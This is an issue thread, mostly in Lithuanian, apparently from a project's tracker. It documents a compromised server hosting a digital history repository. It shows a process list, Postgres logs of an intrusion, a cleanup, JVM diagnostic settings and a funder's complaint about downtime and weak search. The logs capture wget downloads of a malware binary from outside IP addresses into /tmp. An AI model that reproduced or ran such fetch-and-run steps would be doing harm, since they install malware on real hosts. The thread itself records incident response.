Closed tkrilavicius closed 8 years ago
duplicate of #54 - Postgres DB saugumo skylių problema/exploitas
ps -e -o pid,vsz,comm= | sort -n -k 2
<...>
2148 10316 nmbd
2633 16016 winbindd
3198 16016 winbindd
2611 16840 winbindd
3199 16840 winbindd
1414 17128 postgres
2171 19884 smbd
2196 20304 smbd
3117 23360 polkitd
3050 29028 console-kit-dae
2100 31024 rsyslogd
1412 46624 postgres
16032 46624 postgres
1411 46724 postgres
1413 47344 postgres
24643 231244 apache2
24645 231244 apache2
2944 635828 facebook
7885 3114756 testproxy
Atitinkami logai postgress:
2016-01-19 11:32:46 EET LOG: incomplete startup packet
2016-01-19 11:32:47 EET ERROR: syntax error at or near "36367" at character 1
2016-01-19 11:32:47 EET STATEMENT: 36367
--2016-01-19 11:32:49-- http://193.85.186.50:23231/Farmm
Connecting to 193.85.186.50:23231... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1303748 (1.2M) [application/octet-stream]
Saving to: `/tmp/facebook'
0K .......... .......... .......... .......... .......... 3% 310K 4s
50K .......... .......... .......... .......... .......... 7% 562K 3s
100K .......... .......... .......... .......... .......... 11% 1.12M 2s
150K .......... .......... .......... .......... .......... 15% 560K 2s
200K .......... .......... .......... .......... .......... 19% 1.11M 2s
250K .......... .......... .......... .......... .......... 23% 611K 2s
300K .......... .......... .......... .......... .......... 27% 610K 2s
350K .......... .......... .......... .......... .......... 31% 1.01M 1s
400K .......... .......... .......... .......... .......... 35% 612K 1s
450K .......... .......... .......... .......... .......... 39% 1.08M 1s
500K .......... .......... .......... .......... .......... 43% 620K 1s
550K .......... .......... .......... .......... .......... 47% 608K 1s
600K .......... .......... .......... .......... .......... 51% 1.04M 1s
650K .......... .......... .......... .......... .......... 54% 625K 1s
700K .......... .......... .......... .......... .......... 58% 1.05M 1s
750K .......... .......... .......... .......... .......... 62% 615K 1s
800K .......... .......... .......... .......... .......... 66% 1.08M 1s
850K .......... .......... .......... .......... .......... 70% 2.44M 1s
900K .......... .......... .......... .......... .......... 74% 1.73M 0s
950K .......... .......... .......... .......... .......... 78% 3.23M 0s
1000K .......... .......... .......... .......... .......... 82% 1.36M 0s
1050K .......... .......... .......... .......... .......... 86% 3.71M 0s
1100K .......... .......... .......... .......... .......... 90% 3.20M 0s
1150K .......... .......... .......... .......... .......... 94% 3.10M 0s
1200K .......... .......... .......... .......... .......... 98% 3.83M 0s
1250K .......... .......... ... 100% 3.02M=1.4s
2016-01-19 11:32:50 (914 KB/s) - `/tmp/facebook' saved [1303748/1303748]
2016-01-19 15:35:58 EET LOG: unexpected EOF on client connection
2016-01-19 15:35:58 EET LOG: unexpected EOF on client connection
2016-01-19 15:35:58 EET LOG: unexpected EOF on client connection
2016-01-19 15:35:58 EET LOG: unexpected EOF on client connection
2016-01-19 15:35:58 EET LOG: unexpected EOF on client connection
2016-01-19 15:35:58 EET LOG: unexpected EOF on client connection
2016-01-19 15:35:58 EET LOG: unexpected EOF on client connection
<...>
016-01-19 15:35:58 EET LOG: unexpected EOF on client connection
--2016-01-19 16:35:34-- http://192.168.5.105/amp.txt
Connecting to 192.168.5.105:80... failed: Connection timed out.
Retrying.
--2016-01-19 16:36:38-- (try: 2) http://192.168.5.105/amp.txt
Connecting to 192.168.5.105:80... failed: Connection timed out.
Retrying.
--2016-01-19 16:37:43-- (try: 3) http://192.168.5.105/amp.txt
Connecting to 192.168.5.105:80... failed: Connection timed out.
Retrying.
--2016-01-19 16:38:49-- (try: 4) http://192.168.5.105/amp.txt
Connecting to 192.168.5.105:80... failed: Connection timed out.
Retrying.
--2016-01-19 16:39:57-- (try: 5) http://192.168.5.105/amp.txt
Connecting to 192.168.5.105:80... failed: Connection timed out.
Retrying.
--2016-01-19 16:41:05-- (try: 6) http://192.168.5.105/amp.txt
Connecting to 192.168.5.105:80... failed: Connection timed out.
Retrying.
<...>
2016-01-19 19:13:53 EET LOG: incomplete startup packet
2016-01-19 19:13:54 EET ERROR: syntax error at or near "36368" at character 1
2016-01-19 19:13:54 EET STATEMENT: 36368
--2016-01-19 19:13:56-- http://23.251.49.126:9998/Farmm
Connecting to 23.251.49.126:9998... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1303748 (1.2M) [application/octet-stream]
Saving to: `/tmp/twitter'
0K .......... .......... .......... .......... .......... 3% 38.5K 32s
50K .......... .......... .......... .......... .......... 7% 217K 18s
100K .......... .......... .......... .......... .......... 11% 135K 14s
150K .......... .......... .......... .......... .......... 15% 114K 13s
200K .......... .......... .......... .......... .......... 19% 173K 11s
250K .......... .......... .......... .......... .......... 23% 153K 10s
300K .......... .......... .......... .......... .......... 27% 128K 9s
350K .......... .......... .......... .......... .......... 31% 133K 8s
400K .......... .......... .......... .......... .......... 35% 103K 8s
450K .......... .......... .......... .......... .......... 39% 86.4K 7s
500K .......... .......... .......... .......... .......... 43% 71.2K 7s
550K .......... .......... .......... .......... .......... 47% 213K 6s
600K .......... .......... .......... .......... .......... 51% 154K 6s
650K .......... .......... .......... .......... .......... 54% 114K 5s
700K .......... .......... .......... .......... .......... 58% 24.9K 6s
750K .......... .......... .......... .......... .......... 62% 258K 5s
800K .......... .......... .......... .......... .......... 66% 229K 4s
850K .......... .......... .......... .......... .......... 70% 228K 4s
900K .......... .......... .......... .......... .......... 74% 179K 3s
950K .......... .......... .......... .......... .......... 78% 197K 3s
1000K .......... .......... .......... .......... .......... 82% 202K 2s
1050K .......... .......... .......... .......... .......... 86% 213K 2s
1100K .......... .......... .......... .......... .......... 90% 177K 1s
1150K .......... .......... .......... .......... .......... 94% 186K 1s
1200K .......... .......... .......... .......... .......... 98% 139K 0s
1250K .......... .......... ... 100% 101K=11s
2016-01-19 19:14:09 (113 KB/s) - `/tmp/twitter' saved [1303748/1303748]
sistema išvalyta, taip pat sugriežtinau Postgres pasiekiamumą iš išorės
vėl neveikia
rinksim daugiau diagnostinės informacijos:
-Djava.awt.headless=true -Xms512m -Xmx2048m -Dfile.encoding=UTF-8 -Djavax.net.debug=ssl -XX:+DisableExplicitGC -XX:+HeapDumpOnOutOfMemoryError
plius, naudojam CATALINA_OPTS vietoj JAVA_OPTS
uždarau iki sekančio karto. tada turėsim daugiau diagnostinės informacijos
vėl neveikia, ir gavau per galvą rimtai - nepatvirtino rezultatų
"Ataskaitoje nurodyta, kad sukurtą skaitmeninę bazę galima pažiūrėti adresu http://talpykla.istorija.lt/handle/123456789/221?locale-attribute=lt, bet tiek ši nuoroda, tiek ir serveris talpykla.istorija.lt veikia nestabiliai, pvz. vasario 7-9, 12 d. visiškai neveikė."
O dėl paieškos, tai man rodos, kad ten turėtų per visus laukus, ar ne? "Pavykus prisijungti prie sistemos, pastebėta, kad ji veikia nekokybiškai: paieška yra galima tik pagal raktinius žodžius, kurie yra pernelyg abstraktūs ir bendri daugeliui dokumentų, todėl tokios paieškos sistemos vertė abejotina. Nesuprantama, kodėl negalima paieška pagal leidinio redaktoriaus pavardę ir pan."